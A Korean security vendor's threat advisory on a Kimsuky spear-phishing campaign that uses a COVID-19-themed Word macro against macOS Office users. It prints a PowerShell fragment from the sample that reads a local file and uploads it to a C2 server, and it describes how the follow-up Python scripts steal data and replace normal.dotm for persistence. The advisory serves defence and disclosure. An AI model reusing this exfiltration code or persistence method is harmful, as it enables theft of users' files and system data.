김수키(Kimsuky)조직, 코로나 바이러스 이슈를 악용하여 MacOS MS오피스 사용자를 타겟으로 진행중인 APT 공격 주의!

안녕하세요? 이스트시큐리티 ESRC(시큐리티대응센터) 입니다.

코로나 바이러스 이슈를 악용한 김수키(Kimsuky) 조직의 APT 공격이 또 한번 포착되었습니다. 

김수키(Kimsuky) 조직은 2월 28일, 이미 '코로나 바이러스 관련 이사장님 지시사항'이라는 이메일 제목으로 스피어피싱 공격을 진행한 적이 있습니다. 

이번에 발견된 악성 파일은 'COVID-19 and North Korea.docx' 파일명으로 유포되었으며, TTPs 등을 분석한 결과, 국내 기업/기관을 대상으로 스피어피싱과 APT 공격을 지속해 오고있는 김수키(Kimsuky) 조직의 '스모크 스크린' 캠페인의 일환으로 추정하고 있습니다. 

※ 스모크 스크린 캠페인 관련글

▶ 김수키(Kimsuky)조직, 비건 미국무부 부장관 서신 내용으로 위장한 APT 공격 수행 (20.03.03)

▶ ‘통일외교안보특보 발표문건’ 사칭 스피어피싱 공격 등장… 김수키(Kimsuky) 조직 소행 추정 (20.01.14)

▶ 북한 파일명으로 보고된 Kimsuky 조직의 '스모크 스크린' PART 3 (19.09.27)

▶ 암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2 (19.05.13)

▶ 한ㆍ미 겨냥 APT 캠페인 '스모크 스크린' Kimsuky 실체 공개 (19.04.17)

이번에 발견된 'COVID-19 and North Korea.docx' 파일을 실행하면, 공격자가 미리 설정해 놓은 c2로 연결됩니다. 

[그림 1] 워드파일을 실행할 때 c2로 연결되는 화면

이 워드 파일에는 악성 매크로가 포함되어 있으며, 사용자의 매크로 실행을 유도합니다. 

[그림 2] 악성 매크로가 포함되어 있는 화면

만약 사용자가 [콘텐츠 사용]을 클릭하게 되면, Dear Friends로 시작하는 내용의 워드 파일 내용이 보여지게 됩니다. 하지만 이는 정상 파일처럼 보이도록 위장한 것으로, 백그라운드에서는 워드 파일에 포함되어 있던 악성 매크로가 동작을 하게 됩니다. 

[그림 3] 악성매크로 실행 후 보여지는 화면 

워드파일을 분석해 보면 내부에서 숨겨져 있는 c2 호스트를 확인할 수 있습니다. 

[그림 4] 워드문서 내부에 숨겨져 있는 C2 호스트

$readText=[System.IO.File]::ReadAllText($Env:Appdata+$FPath);

$webClient=New-ObjectSystem.Net.WebClient;

$webClient.Headers.Add("User-Agent","Mozilla/5.0compatible;MSIE10.0;WindowsNT6.1;WOW64;Trident/7.0");

$webClient.Headers.Add("Accept-Language","en-US,en;q=0.9");

$webClient.Headers.Add("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8");

$webClient.Headers.Add("Content-Type","multipart/form-data;boundary=----7e222d1d50232");

$boundary="----7e222d1d50232";

$postData="--"+$boundary+"`r`nContent-Disposition:form-data;name=""MAX_FILE_SIZE""`r`n`r`n1000000`r`n--"+$boundary+"`r`nContent-Disposition:form-data;name=""file"";filename=""1.txt""`r`nContent-Type:text/plain`r`n`r`n"+$readText+"`r`n--"+$boundary+"--";

$reply=$webClient.UploadString([String]$URI,$postData);

}

이번에도 역시 기존 김수키 코드에서도 여러차례 목격된 적이 있는 바운더리 문자열 '7e222d1d50232' 을 사용하였습니다. 

[그림 5] 김수키 조직의 다른 악성 파일 모습

이번 공격에서 특이한 점은, 윈도우 OS가 아닌 Mac OS의 MS오피스의 이용자를 타겟으로 하고 있다는 점으로, 만약 악성파일을 실행한 사용자의 사용환경에 Mac OS에 MS오피스 맥버전이 설치된 경우 공격자에게 사용자 정보가 수집될 수 있습니다. 

[그림 6] MAC OS에 설치되어 있는 MS오피스 화면

이렇게 C2에 접속해서 추가 악성파일을 내려받는데, 그 중에는 두 개의 파이썬 스크립트 파일도 포함되어 있습니다.

내려받는 파이썬 스크립트 중 하나의 기능은 5분 마다 다음 사용자 정보들을 수집하고 새 악성코드 다운로드 및 실행 합니다.

- 감염자 시스템 정보(os, username, cpu, hardware, network)

- 설치된 프로그램 목록, 

- documents 경로 파일 목록, downloads 경로 파일 목록, desktop 경로 파일목록, 디스크 목록 정보

ls 명령어로 특정 경로에서 파일목록을 수집하고 맥OS에서 사용되는 MS오피스 경로에 backup.zip파일로 압축하여 C2로 전송합니다. 

[그림 7] Mac OS MS 오피스 사용자를 타겟으로 하는 코드

파일을 전송할때 사용되는 특징은 기존 김수키의 방식과 동일하며, 전송에 성공하면 backup.zip파일을 삭제 합니다.

또 하나의 파이썬 스크립트 기능은 감염된 맥OS사용자의 기존 "기본 서식 파일(normal.dotm)"의 교체를 시도합니다. 기존 파일 삭제 후 C2에 있는 파일로 교체를 시도합니다. 이 파일이 교체되면 앞으로 사용자가 생성하는 문서에 바뀐 기본 서식이 적용되므로 '감염' 효과를 낼 수 있습니다. 교체 후에는 C2에서 새로운 악성코드를 다운로드 및 실행을 시도합니다.

현재 알약에서는  Trojan.Python.gen,  Exploit.MSOffice.Gen 으로 탐지중에 있으며 관련 ioc는 Threat Inside에서 확인하실 수 있습니다.